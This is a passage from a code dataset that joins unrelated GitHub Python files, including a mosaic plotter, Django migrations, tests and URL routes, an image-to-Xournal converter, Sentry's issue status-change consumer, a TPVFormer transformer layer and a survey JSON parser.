x_exterior, y_exterior = polygon.exterior.xy\n                x_coords_in_range = [self.check_coords_in_range(coord, 0, self.mosaic_width) for coord in x_exterior]\n                y_coords_in_range = [self.check_coords_in_range(coord, 0, self.mosaic_height) for coord in y_exterior]\n\n                polygon_is_in_valid_area = np.all(y_coords_in_range) and np.all(x_coords_in_range)\n\n                if polygon_is_in_valid_area:\n                    polygons_cut += [polygon]\n        logger.info(f\"Up to {counter} tiles beyond image borders were cut in {time.time()-t_0:.1f}s\")\n        return polygons_cut\n\n    @staticmethod\n    def check_coords_in_range(coords, lower_bound, higher_bound):\n        if lower_bound <= coords < higher_bound:\n            return True\n        return False\n\n    def plot_polygons(self, polygons, colors=None, background=None):\n\n        # Turn interactive plotting off\n        plt.ioff()\n        logger.info(\"Plotting polygons for mosaic\")\n        fig, axes = plt.subplots(dpi=96, figsize=(self.config.mosaic_width / 2.54, self.config.mosaic_height / 2.54))\n        plt.subplots_adjust(left=0, right=1, top=1, bottom=0)\n        axes.invert_yaxis()\n        axes.autoscale()\n        axes.set_facecolor(\"darkslategray\")\n        # ax.set_facecolor((1.0, 0.47, 0.42))\n\n        for j, polygon in enumerate(tqdm(polygons)):\n\n            if colors is not None:\n                color = colors[j]\n                edgecolor = \"black\"\n            else:\n                color = \"silver\"\n                edgecolor = \"black\"\n\n            corners = np.array(polygon.exterior.coords.xy).T\n            tile = patches.Polygon(corners, edgecolor=edgecolor, lw=0.3, facecolor=color)\n            axes.add_patch(tile)\n\n        if background is not None:\n            axes.set_facecolor(\"antiquewhite\")\n        axes.margins(0)\n        fig.canvas.draw()\n        # plt.show()\n\n        return 
fig\n","repo_name":"JavierCoronel/mosaic_generator","sub_path":"mosaic/mosaic_tiles.py","file_name":"mosaic_tiles.py","file_ext":"py","file_size_in_byte":12281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"11902396961","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('article', '0007_article_clothing_style'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='article',\n name='clothing_style',\n field=models.CharField(default=b'PROFESSIONAL', max_length=12, choices=[(b'PROFESSIONAL', b'Professional'), (b'STREET', b'Street'), (b'PREP', b'Prep')]),\n ),\n ]\n","repo_name":"phil-a/TMC","sub_path":"django/django_test/article/migrations/0008_auto_20150428_0007.py","file_name":"0008_auto_20150428_0007.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"17299448872","text":"from .dependencies_imports import *\n\nproduct_payload: Dict[str, Any] = {\n 'name': 'some_product',\n 'description': 'description 1',\n 'unit_price': 1.0,\n 'stok': 10,\n 'image_url': None,\n 'offer': True,\n 'discount_rate': 10,\n}\n\n\nclass TestPublicCartItemsListView(APITestCase):\n\n def setUp(self):\n user = get_or_create_user(email='test@email.com', dni='12345678', password='testpassword')\n category = create_category(name='Test Category')\n product = create_product(category=category, **product_payload)\n self.cart = cart_models.Cart.objects.get(user=user)\n create_cart_item(cart=self.cart, product=product, ammount=1)\n self.url = get_cart_item_url('private_cart_items', user_id=user.id)\n self.client = APIClient()\n return super().setUp()\n\n def test_try_to_get_list_of_cart_items_without_authentication(self):\n \"\"\"\n Try to get a list of cart items without authentication.\n This operation should return a status code 401.\n \"\"\"\n response = self.client.get(self.url, format='json')\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\nclass TestPrivateCartItemsListView(APITestCase):\n\n def setUp(self):\n user = get_or_create_user(email='test@email.com', dni='12345678', password='testpassword')\n category = create_category(name='Test Category')\n product = create_product(category=category, **product_payload)\n self.cart = cart_models.Cart.objects.get(user=user)\n create_cart_item(cart=self.cart, product=product, ammount=1)\n create_cart_item(cart=self.cart, product=product, ammount=2)\n self.url = get_cart_item_url('private_cart_items', user_id=user.id)\n self.client = APIClient()\n self.client.force_authenticate(user=user)\n return super().setUp()\n\n def test_get_list_of_cart_items(self):\n \"\"\"\n Get a list of cart items.\n This operation should return a status code 200 and a list of cart items.\n \"\"\"\n cart_items = cart_models.CartItem.objects.filter(cart=self.cart)\n response = self.client.get(self.url, format='json')\n data = response.json()\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(data['results']['items']), cart_items.count())\n self.assertEqual(data['results']['items'], serializers.CartItemSerializer(cart_items, 
many=True).data)\n","repo_name":"francomz92/store_drf","sub_path":"server/tests/shop/cart/cart_items/test_list_cart_items.py","file_name":"test_list_cart_items.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"6162816687","text":"from django.contrib import admin\nfrom django.urls import path, include\n\nfrom . import views\n\nurlpatterns = [\n # Auth\n path('', views.user_admin_login, name=\"user_admin_login\"),\n path('logout/', views.user_admin_logout, name=\"user_admin_logout\"),\n path('edit-details/', views.view_admin_edit_form, name=\"view_admin_edit_form\"),\n path('edit/', views.edit_admin_details, name=\"edit_admin_details\"),\n\n # Reset password of admin\n path('reset-password/', views.admin_reset_password, name=\"admin_reset_password\"),\n\n\n\n path('home/', views.user_admin_home, name=\"user_admin_home\"),\n path(\"view-posts/\", views.view_posts, name=\"view_posts\"),\n \n # Search Orders & Download PDF\n path(\"search-orders/\", views.user_admin_search_orders, name=\"user_admin_search_orders\"),\n path(\"download-orders/\", views.download_order_to_pdf, name=\"download_order_to_pdf\"),\n\n # Search Marketer's Clients\n path(\"marketer/clients-search/\", views.search_marketers_clients, name=\"search_marketers_clients\"),\n\n # View Discount requests\n path(\"view-all-discount-requests/\", views.view_all_discount_requests, name=\"view_all_discount_requests\"),\n \n # View Gst Relax requests\n path(\"view-all-gst-relax-requests/\", views.view_all_gst_relax_requests, name=\"view_all_gst_relax_requests\"),\n\n\n # Search for Discount requests\n path(\"search-discount-requests/\", views.search_discount_requests, name=\"search_discount_requests\"),\n\n # Search for Gst Relax requests\n path(\"search-gst-relax-requests/\", views.search_gst_relax_requests, name=\"search_gst_relax_requests\"),\n \n\n # Allow/Reject Discount\n path(\"allow-discount-to-client/\", views.grant_discount_to_client, name=\"grant_discount_to_client\"),\n\n path(\"reject-discount-to-client/\", views.reject_discount_request, name=\"reject_discount_request\"),\n \n \n # Allow/Reject Gst Relax Request\n path(\"allow-gst-relax-to-client/\", views.accept_gst_relax_request, name=\"accept_gst_relax_request\"),\n path(\"reject-gst-relax-to-client/\", views.reject_gst_relax_request, name=\"reject_gst_relax_request\"),\n\n # path(\"reject-discount-to-client/\", views.reject_discount_request, name=\"reject_discount_request\"),\n]\n\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n urlpatterns += static(settings.STATIC_URL,\n document_root=settings.STATIC_ROOT)\n","repo_name":"vaishnavm1/ott_admanager","sub_path":"user_admin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"37012145640","text":"import sys\r\nimport xml.etree.ElementTree as gfg # for xml creation\r\nimport gzip # gzipping .xml to .xopp\r\nimport PIL # for image manipulation\r\nfrom PIL import Image\r\nimport base64 # base 64 encoding\r\nfrom io import BytesIO # byte array\r\n\r\ndef pil2xopp(pil_images: list, xopp_path: str, poppler_path: str = None, \r\n max_width: int = None, max_height: int = None):\r\n \r\n # default hardcoded header\r\n root = gfg.Element(\"xournal\")\r\n 
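# Usage sketch (added comment; 'page.png' and 'out.xopp' are hypothetical example names): pil2xopp([Image.open('page.png')], 'out.xopp', max_width=1200)\r\n    # The 'xournal' root element and the creator/fileversion attributes set below mimic a file saved by Xournal++ 1.1.1.\r\n    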
root.set(\"creator\", \"Xournal++ 1.1.1\")\r\n root.set(\"fileversion\", \"4\")\r\n print(\"initilised xml for xopp\")\r\n \r\n for i,page in enumerate(pil_images):\r\n # Determine the page size (to keep the aspect ratio)\r\n xopp_page_width: float = 595.27559100 # default from xopp document\r\n xopp_page_height: float = xopp_page_width * float(page.size[1]/page.size[0])\r\n \r\n page_xml = gfg.SubElement(root, \"page\")\r\n page_xml.set(\"width\", str(xopp_page_width))\r\n page_xml.set(\"height\", str(xopp_page_height))\r\n\r\n # set a background (checked paper)\r\n bg_xml = gfg.SubElement(page_xml, \"background\")\r\n bg_xml.set(\"type\", \"solid\")\r\n bg_xml.set(\"color\", \"#ffffffff\")\r\n bg_xml.set(\"style\", \"graph\")\r\n \r\n # The image element is wrapped by a layer element\r\n layer_xml = gfg.SubElement(page_xml, \"layer\")\r\n \r\n img_xml = gfg.SubElement(layer_xml, \"image\")\r\n # That it fills the whole page (will not be strechted)\r\n img_xml.set(\"left\", \"0\")\r\n img_xml.set(\"top\", \"0\")\r\n img_xml.set(\"right\", str(xopp_page_width))\r\n img_xml.set(\"bottom\", str(xopp_page_height))\r\n \r\n # convert the current page to a base 64 encoded PNG image\r\n \r\n # downscale the image to a given maximum\r\n if not max_width: max_width = page.size[0]\r\n if not max_height: max_height = page.size[1]\r\n page.thumbnail((max_width, max_height))\r\n \r\n bytes_buffer = BytesIO()\r\n page.save(bytes_buffer, format=\"PNG\")\r\n img_xml.text = base64.b64encode(bytes_buffer.getvalue()).decode()\r\n\r\n \r\n # Saving the xml file gzipped with the extension xopp\r\n tree = gfg.ElementTree(root) # An element tree that can write bytes to files\r\n with gzip.open(xopp_path, \"wb\") as output_file:\r\n tree.write(output_file)","repo_name":"OsiPog/school-tool","sub_path":"src/tools/pil2xopp.py","file_name":"pil2xopp.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"21392238142","text":"import os\nfrom PIL import Image\n\ndef get_image(count):\n scp_command = 'scp pi@192.168.2.5:Desktop/gregTest.jpg ' + 'images/' + str(count) + '.jpg'\n os.system(scp_command)\n return\n\t# os.system('scp pi@192.168.2.5:Desktop/gregTest.jpg gregTest.jpg')\n #use following to create key if needed: https://www.raspberrypi.org/documentation/remote-access/ssh/passwordless.md\n\ndef valid_image(path):\n\ttry:\n\t\tImage.open(path)\n\texcept IOError:\n\t\treturn False\n\treturn True\n","repo_name":"Garner412/RaspberryDrive","sub_path":"get_images_from_pi.py","file_name":"get_images_from_pi.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"92"} +{"seq_id":"40519076953","text":"from __future__ import annotations\n\nimport logging\nfrom collections import defaultdict\nfrom typing import Any, Iterable, Mapping, Sequence, Tuple\n\nfrom sentry_sdk.tracing import NoOpSpan, Transaction\n\nfrom sentry import features\nfrom sentry.issues.status_change_message import StatusChangeMessageData\nfrom sentry.models.group import Group, GroupStatus\nfrom sentry.models.grouphash import GroupHash\nfrom sentry.models.organization import Organization\nfrom sentry.models.project import Project\nfrom sentry.types.activity import ActivityType\nfrom sentry.types.group import IGNORED_SUBSTATUS_CHOICES, GroupSubStatus\nfrom sentry.utils import metrics\n\nlogger = logging.getLogger(__name__)\n\n\ndef update_status(group: Group, status_change: 
StatusChangeMessageData) -> None:\n new_status = status_change[\"new_status\"]\n new_substatus = status_change[\"new_substatus\"]\n\n if group.status == new_status and group.substatus == new_substatus:\n return\n\n log_extra = {\n \"project_id\": status_change[\"project_id\"],\n \"fingerprint\": status_change[\"fingerprint\"],\n \"new_status\": new_status,\n \"new_substatus\": new_substatus,\n }\n\n # Validate the provided status and substatus - we only allow setting a substatus for unresolved or ignored groups.\n if new_status in [GroupStatus.UNRESOLVED, GroupStatus.IGNORED]:\n if new_substatus is None:\n logger.error(\n \"group.update_status.missing_substatus\",\n extra={**log_extra},\n )\n return\n else:\n if new_substatus is not None:\n logger.error(\n \"group.update_status.unexpected_substatus\",\n extra={**log_extra},\n )\n return\n\n if new_status == GroupStatus.RESOLVED:\n Group.objects.update_group_status(\n groups=[group],\n status=new_status,\n substatus=new_substatus,\n activity_type=ActivityType.SET_RESOLVED,\n )\n elif new_status == GroupStatus.IGNORED:\n # The IGNORED status supports 3 substatuses. For UNTIL_ESCALATING and\n # UNTIL_CONDITION_MET, we expect the caller to monitor the conditions/escalating\n # logic and call the API with the new status when the conditions change.\n if new_substatus not in IGNORED_SUBSTATUS_CHOICES:\n logger.error(\n \"group.update_status.invalid_substatus\",\n extra={**log_extra},\n )\n return\n\n Group.objects.update_group_status(\n groups=[group],\n status=new_status,\n substatus=new_substatus,\n activity_type=ActivityType.SET_IGNORED,\n )\n elif new_status == GroupStatus.UNRESOLVED:\n activity_type = None\n if new_substatus == GroupSubStatus.ESCALATING:\n activity_type = ActivityType.SET_ESCALATING\n elif new_substatus == GroupSubStatus.REGRESSED:\n activity_type = ActivityType.SET_REGRESSION\n elif new_substatus == GroupSubStatus.ONGOING:\n activity_type = ActivityType.SET_UNRESOLVED\n\n # We don't support setting the UNRESOLVED status with substatus NEW as it\n # is automatically set on creation. 
All other issues should be set to ONGOING.\n if activity_type is None:\n logger.error(\n \"group.update_status.invalid_substatus\",\n extra={**log_extra},\n )\n return\n\n Group.objects.update_group_status(\n groups=[group],\n status=new_status,\n substatus=new_substatus,\n activity_type=activity_type,\n )\n else:\n logger.error(\n \"group.update_status.unsupported_status\",\n extra={**log_extra},\n )\n raise NotImplementedError(\n f\"Unsupported status: {status_change['new_status']} {status_change['new_substatus']}\"\n )\n\n\ndef bulk_get_groups_from_fingerprints(\n project_fingerprint_pairs: Iterable[Tuple[int, Sequence[str]]]\n) -> dict[Tuple[int, str], Group]:\n \"\"\"\n Returns a map of (project, fingerprint) to the group.\n\n Note that fingerprints for issue platform are expected to be\n processed via `process_occurrence_data` prior to calling this function.\n \"\"\"\n fingerprints_by_project: dict[int, list[str]] = defaultdict(list)\n for project_id, fingerprints in project_fingerprint_pairs:\n fingerprints_by_project[project_id].append(fingerprints[0])\n\n query = GroupHash.objects.none()\n for project_id, fingerprints in fingerprints_by_project.items():\n query = query.union(\n GroupHash.objects.filter(\n project=project_id,\n hash__in=fingerprints,\n ).select_related(\"group\")\n )\n\n result: dict[Tuple[int, str], Group] = {\n (grouphash.project_id, grouphash.hash): grouphash.group for grouphash in query\n }\n\n found_fingerprints = set(result.keys())\n fingerprints_set = {\n (project_id, fingerprint[0]) for project_id, fingerprint in project_fingerprint_pairs\n }\n for project_id, fingerprint in fingerprints_set - found_fingerprints:\n logger.error(\n \"grouphash.not_found\",\n extra={\n \"project_id\": project_id,\n \"fingerprint\": fingerprint,\n },\n )\n\n return result\n\n\ndef _get_status_change_kwargs(payload: Mapping[str, Any]) -> Mapping[str, Any]:\n \"\"\"\n Processes the incoming message payload into a format we can use.\n \"\"\"\n from sentry.issues.ingest import process_occurrence_data\n\n data = {\n \"fingerprint\": payload[\"fingerprint\"],\n \"project_id\": payload[\"project_id\"],\n \"new_status\": payload[\"new_status\"],\n \"new_substatus\": payload.get(\"new_substatus\", None),\n }\n\n process_occurrence_data(data)\n return {\"status_change\": data}\n\n\ndef process_status_change_message(\n message: Mapping[str, Any], txn: Transaction | NoOpSpan\n) -> Group | None:\n with metrics.timer(\"occurrence_consumer._process_message.status_change._get_kwargs\"):\n kwargs = _get_status_change_kwargs(message)\n status_change_data = kwargs[\"status_change\"]\n\n metrics.incr(\n \"occurrence_ingest.status_change.messages\",\n sample_rate=1.0,\n tags={\"new_status\": status_change_data[\"new_status\"]},\n )\n txn.set_tag(\"new_status\", status_change_data[\"new_status\"])\n\n project = Project.objects.get_from_cache(id=status_change_data[\"project_id\"])\n organization = Organization.objects.get_from_cache(id=project.organization_id)\n\n txn.set_tag(\"organization_id\", organization.id)\n txn.set_tag(\"organization_slug\", organization.slug)\n txn.set_tag(\"project_id\", project.id)\n txn.set_tag(\"project_slug\", project.slug)\n\n if not features.has(\"organizations:issue-platform-api-crons-sd\", organization):\n metrics.incr(\n \"occurrence_ingest.status_change.dropped_feature_disabled\",\n sample_rate=1.0,\n )\n txn.set_tag(\"result\", \"dropped_feature_disabled\")\n return None\n\n with metrics.timer(\"occurrence_consumer._process_message.status_change.get_group\"):\n 
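# NOTE (added comment): process_occurrence_data (called in _get_status_change_kwargs) has already\n        # normalized the fingerprint; the lookup below is keyed by (project_id, primary hash).\n        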
fingerprint = status_change_data[\"fingerprint\"]\n groups_by_fingerprints = bulk_get_groups_from_fingerprints([(project.id, fingerprint)])\n group = groups_by_fingerprints.get((project.id, fingerprint[0]), None)\n if not group:\n metrics.incr(\n \"occurrence_ingest.status_change.dropped_group_not_found\",\n sample_rate=1.0,\n )\n return None\n txn.set_tag(\"group_id\", group.id)\n\n with metrics.timer(\"occurrence_consumer._process_message.status_change.update_group_status\"):\n update_status(group, status_change_data)\n\n return group\n","repo_name":"getsentry/sentry","sub_path":"src/sentry/issues/status_change_consumer.py","file_name":"status_change_consumer.py","file_ext":"py","file_size_in_byte":7793,"program_lang":"python","lang":"en","doc_type":"code","stars":35611,"dataset":"github-code","pt":"92"} +{"seq_id":"2909178297","text":"import pymysql\n\nfrom bili import data_all\n\n\n\ndata = data_all()\n\n# 1. 连接数据库\nconn = pymysql.connect(host='127.0.0.1', port=3306, user='root', password='12345678', db='day80')\ncursor = conn.cursor(cursor=pymysql.cursors.DictCursor)\n\n# 2. 发送指令\nfor up_list in data:\n if up_list:\n for item in up_list:\n author = item[0]\n title = item[1]\n href = item[2]\n created = item[3]\n cursor.execute('select * from bili where href = %s', [href, ])\n if not cursor.fetchone():\n sql = 'insert into bili(author, title, href, created) values (%s, %s, %s, %s)'\n cursor.execute(sql, [author, title, href, created])\n conn.commit()\n\nsql1 = 'select * from bili order by author asc'\ncursor.execute(sql1)\ndata_list = cursor.fetchall()\ncontents = {\n 'data_list': data_list\n}\nprint(contents)\n# 3. 关闭连接\ncursor.close()\nconn.close()","repo_name":"iiweixiao/pythoncode","sub_path":"day82/Django82/Django82/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"19716413869","text":"import copy\nimport warnings\n\nimport torch\nfrom mmcv.cnn import build_norm_layer\nfrom mmcv.cnn.bricks.transformer import (build_attention,\n build_feedforward_network)\nfrom mmengine.config import ConfigDict\nfrom mmengine.model import BaseModule, ModuleList\nfrom mmengine.registry import MODELS\n\n\n@MODELS.register_module()\nclass TPVFormerLayer(BaseModule):\n \"\"\"Base `TPVFormerLayer` for vision transformer.\n\n It can be built from `mmcv.ConfigDict` and support more flexible\n customization, for example, using any number of `FFN or LN ` and\n use different kinds of `attention` by specifying a list of `ConfigDict`\n named `attn_cfgs`. It is worth mentioning that it supports `prenorm`\n when you specifying `norm` as the first element of `operation_order`.\n More details about the `prenorm`: `On Layer Normalization in the\n Transformer Architecture `_ .\n Args:\n attn_cfgs (list[`mmcv.ConfigDict`] | obj:`mmcv.ConfigDict` | None )):\n Configs for `self_attention` or `cross_attention` modules,\n The order of the configs in the list should be consistent with\n corresponding attentions in operation_order.\n If it is a dict, all of the attention modules in operation_order\n will be built with this config. 
Default: None.\n ffn_cfgs (list[`mmcv.ConfigDict`] | obj:`mmcv.ConfigDict` | None )):\n Configs for FFN, The order of the configs in the list should be\n consistent with corresponding ffn in operation_order.\n If it is a dict, all of the attention modules in operation_order\n will be built with this config.\n operation_order (tuple[str]): The execution order of operation\n in transformer. Such as ('self_attn', 'norm', 'ffn', 'norm').\n Support `prenorm` when you specifying first element as `norm`.\n Default: None.\n norm_cfg (dict): Config dict for normalization layer.\n Default: dict(type='LN').\n init_cfg (obj:`mmcv.ConfigDict`): The Config for initialization.\n Default: None.\n batch_first (bool): Key, Query and Value are shape\n of (batch, n, embed_dim)\n or (n, batch, embed_dim). Default to False.\n \"\"\"\n\n def __init__(self,\n attn_cfgs=None,\n ffn_cfgs=dict(\n type='FFN',\n feedforward_channels=1024,\n num_fcs=2,\n ffn_drop=0.,\n act_cfg=dict(type='ReLU', inplace=True),\n ),\n operation_order=None,\n norm_cfg=dict(type='LN'),\n init_cfg=None,\n batch_first=True,\n **kwargs):\n deprecated_args = dict(\n feedforward_channels='feedforward_channels',\n ffn_dropout='ffn_drop',\n ffn_num_fcs='num_fcs')\n for ori_name, new_name in deprecated_args.items():\n if ori_name in kwargs:\n warnings.warn(\n f'The arguments `{ori_name}` in BaseTransformerLayer '\n f'has been deprecated, now you should set `{new_name}` '\n f'and other FFN related arguments '\n f'to a dict named `ffn_cfgs`. ')\n ffn_cfgs[new_name] = kwargs[ori_name]\n\n super().__init__(init_cfg)\n\n self.batch_first = batch_first\n\n num_attn = operation_order.count('self_attn') + operation_order.count(\n 'cross_attn')\n if isinstance(attn_cfgs, dict):\n attn_cfgs = [copy.deepcopy(attn_cfgs) for _ in range(num_attn)]\n else:\n assert num_attn == len(attn_cfgs), f'The length ' \\\n f'of attn_cfg {num_attn} is ' \\\n f'not consistent with the number of attention' \\\n f'in operation_order {operation_order}.'\n\n self.num_attn = num_attn\n self.operation_order = operation_order\n self.norm_cfg = norm_cfg\n self.pre_norm = operation_order[0] == 'norm'\n self.attentions = ModuleList()\n\n index = 0\n for operation_name in operation_order:\n if operation_name in ['self_attn', 'cross_attn']:\n if 'batch_first' in attn_cfgs[index]:\n assert self.batch_first == attn_cfgs[index]['batch_first']\n else:\n attn_cfgs[index]['batch_first'] = self.batch_first\n attention = build_attention(attn_cfgs[index])\n # Some custom attentions used as `self_attn`\n # or `cross_attn` can have different behavior.\n attention.operation_name = operation_name\n self.attentions.append(attention)\n index += 1\n\n self.embed_dims = self.attentions[0].embed_dims\n\n self.ffns = ModuleList()\n num_ffns = operation_order.count('ffn')\n if isinstance(ffn_cfgs, dict):\n ffn_cfgs = ConfigDict(ffn_cfgs)\n if isinstance(ffn_cfgs, dict):\n ffn_cfgs = [copy.deepcopy(ffn_cfgs) for _ in range(num_ffns)]\n assert len(ffn_cfgs) == num_ffns\n for ffn_index in range(num_ffns):\n if 'embed_dims' not in ffn_cfgs[ffn_index]:\n ffn_cfgs[ffn_index]['embed_dims'] = self.embed_dims\n else:\n assert ffn_cfgs[ffn_index]['embed_dims'] == self.embed_dims\n\n self.ffns.append(build_feedforward_network(ffn_cfgs[ffn_index]))\n\n self.norms = ModuleList()\n num_norms = operation_order.count('norm')\n for _ in range(num_norms):\n self.norms.append(build_norm_layer(norm_cfg, self.embed_dims)[1])\n\n def forward(self,\n query,\n key=None,\n value=None,\n tpv_pos=None,\n ref_2d=None,\n tpv_h=None,\n 
tpv_w=None,\n tpv_z=None,\n reference_points_cams=None,\n tpv_masks=None,\n spatial_shapes=None,\n level_start_index=None,\n **kwargs):\n \"\"\"\n **kwargs contains some specific arguments of attentions.\n\n Args:\n query (Tensor): The input query with shape\n [num_queries, bs, embed_dims] if\n self.batch_first is False, else\n [bs, num_queries embed_dims].\n key (Tensor): The key tensor with shape [num_keys, bs,\n embed_dims] if self.batch_first is False, else\n [bs, num_keys, embed_dims] .\n value (Tensor): The value tensor with same shape as `key`.\n tpv_pos (Tensor): The positional encoding for self attn.\n Returns:\n Tensor: forwarded results with shape\n [[bs, num_queries, embed_dims] * 3] for 3 tpv planes.\n \"\"\"\n\n norm_index = 0\n attn_index = 0\n ffn_index = 0\n if self.operation_order[0] == 'cross_attn':\n query = torch.cat(query, dim=1)\n identity = query\n\n for layer in self.operation_order:\n # cross view hybrid-attention\n if layer == 'self_attn':\n ss = torch.tensor(\n [[tpv_h, tpv_w], [tpv_z, tpv_h], [tpv_w, tpv_z]],\n device=query[0].device)\n lsi = torch.tensor(\n [0, tpv_h * tpv_w, tpv_h * tpv_w + tpv_z * tpv_h],\n device=query[0].device)\n\n if not isinstance(query, (list, tuple)):\n query = torch.split(\n query, [tpv_h * tpv_w, tpv_z * tpv_h, tpv_w * tpv_z],\n dim=1)\n\n query = self.attentions[attn_index](\n query,\n identity if self.pre_norm else None,\n query_pos=tpv_pos,\n reference_points=ref_2d,\n spatial_shapes=ss,\n level_start_index=lsi,\n **kwargs)\n attn_index += 1\n query = torch.cat(query, dim=1)\n identity = query\n\n elif layer == 'norm':\n query = self.norms[norm_index](query)\n norm_index += 1\n\n # image cross attention\n elif layer == 'cross_attn':\n query = self.attentions[attn_index](\n query,\n key,\n value,\n identity if self.pre_norm else None,\n reference_points_cams=reference_points_cams,\n tpv_masks=tpv_masks,\n spatial_shapes=spatial_shapes,\n level_start_index=level_start_index,\n **kwargs)\n attn_index += 1\n identity = query\n\n elif layer == 'ffn':\n query = self.ffns[ffn_index](\n query, identity if self.pre_norm else None)\n ffn_index += 1\n query = torch.split(\n query, [tpv_h * tpv_w, tpv_z * tpv_h, tpv_w * tpv_z], dim=1)\n return query\n","repo_name":"open-mmlab/mmdetection3d","sub_path":"projects/TPVFormer/tpvformer/tpvformer_layer.py","file_name":"tpvformer_layer.py","file_ext":"py","file_size_in_byte":9192,"program_lang":"python","lang":"en","doc_type":"code","stars":4289,"dataset":"github-code","pt":"92"} +{"seq_id":"21369050511","text":"import pandas as pd\n\nimport torch.multiprocessing as mp\nfrom functools import partial\n\nfrom data.dynamic import preprocess\nfrom models.mlp import run_mlp_regression\nfrom tqdm import tqdm\nfrom .utils import generate_random_combinations\nfrom .fixed import search_run_fixed\n\ndef search_task_list(args, logger, run_func, task_list):\n # wrapper for easier mp\n return (task_list, search_run_fixed(args, logger, run_func, task_list))\n\ndef search_random(args, logger, run_func):\n\n df = pd.read_csv(args.full_file, index_col=False)\n subtasks = list(df[\"subtask\"].unique())\n\n candidate_task_lists = generate_random_combinations(subtasks, args.search_budget, args.search_n_trials)\n\n df = pd.DataFrame(columns=[\"id\", \"dev_r2\", \"selected_tasks\"])\n best_r2, best_task_list = -1e10, None\n\n if args.search_n_jobs > 1:\n pool = mp.Pool(processes=args.search_n_jobs)\n\n # for i, task_list in enumerate(candidate_task_lists):\n # results.append(pool.apply_async(search_task_list. 
args=(args, logger, run_func, task_list)))\n search_func = partial(search_task_list, args, logger, run_func)\n results = pool.imap(search_func, candidate_task_lists)\n\n for i, result in enumerate(results):\n task_list, dev_r2 = result\n df.loc[len(df.index)] = [i, dev_r2, task_list]\n\n if dev_r2 > best_r2:\n best_r2 = dev_r2\n best_task_list = task_list\n else:\n\n for i, task_list in tqdm(enumerate(candidate_task_lists)):\n \n dev_r2 = search_run_fixed(args, logger, run_func, task_list)\n df.loc[len(df.index)] = [i, dev_r2, task_list]\n\n logger.info(\"Run {}, Dev R2 = {}\".format(i, dev_r2))\n\n if dev_r2 > best_r2:\n best_r2 = dev_r2\n best_task_list = task_list\n \n logger.info(\"Best Dev R2: {}\".format(best_r2))\n logger.info(\"Best list of tasks: {}\".format(best_task_list))\n \n return best_r2, best_task_list, df\n","repo_name":"INK-USC/predicting-big-bench","sub_path":"code/search/random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"28218271851","text":"from .models import *\n\ndef json_parser_survey_standard(survey):\n \"\"\"\n parse survey standard definition from json dictionnary\n \"\"\"\n ss = StandardSurvey(survey['name'])\n if 'comment' in survey:\n ss.comment = json_parser_comment(survey['comment'])\n index = 1\n for qDef in survey['questions']:\n q = json_parser_question(qDef)\n q.order = index\n ss.add_question(q)\n index = index + 1\n return ss\n\ndef json_parser_comment(json):\n if isinstance(json, str):\n return [json]\n return json\n\ndef json_parser_description(json):\n if isinstance(json, str):\n return [json]\n return json\n\ndef import_attr(obj, data, keys):\n for key in keys:\n if key in data:\n setattr(obj, key, data[key])\n\ndef json_parser_question(json):\n \"\"\"\n question definition from json dictionnary\n \"\"\"\n data_name = json['data_name']\n\n q = StandardQuestion(data_name, json['type'], json['title'])\n \n if 'description' in json:\n q.description = json_parser_description(json['description'])\n \n if 'mandatory' in json:\n q.mandatory = json['mandatory']\n \n if 'comment' in json:\n q.comment = json_parser_comment(json['comment'])\n\n import_attr(q, json, ['active','data_type', 'format','rules', 'added_at', 'removed_at', 'platforms', 'target'])\n\n if 'possible_responses' in json:\n index = 1\n for key, rDef in json['possible_responses'].items():\n try:\n r = json_parser_response(key, rDef, index)\n except Exception as e:\n raise StandardParserException(\"Error in %s/%s : %s \" % (data_name, key, e))\n q.add_response(r)\n index = index + 1\n\n if 'rows' in json:\n q.rows = json_parser_matrix_dim(json['rows'])\n\n if 'columns' in json:\n q.columns = json_parser_matrix_dim(json['columns'])\n\n return q\n\ndef json_parser_response(key, json, index):\n \n if not 'text' in json:\n raise StandardParserException(\"Missing 'text' field\")\n \n r = StandardResponse(key, json['text'], index)\n \n import_attr(r, json, ['added_at', 'removed_at', 'platforms'])\n\n if 'value' in json:\n r.value = json['value']\n \n if 'description' in json:\n r.description = json_parser_description(json['description'])\n \n if 'comment' in json:\n r.comment = json_parser_comment(json['comment'])\n\n return r\n\ndef json_parser_matrix_dim(json):\n rr = StandardMatrixDimensionList()\n index = 1\n for key, d in json.items():\n #print(key, d)\n m = StandardMatrixDimension(d['text'], key, d['value'], index)\n rr[key] = m\n index = index + 1\n return 
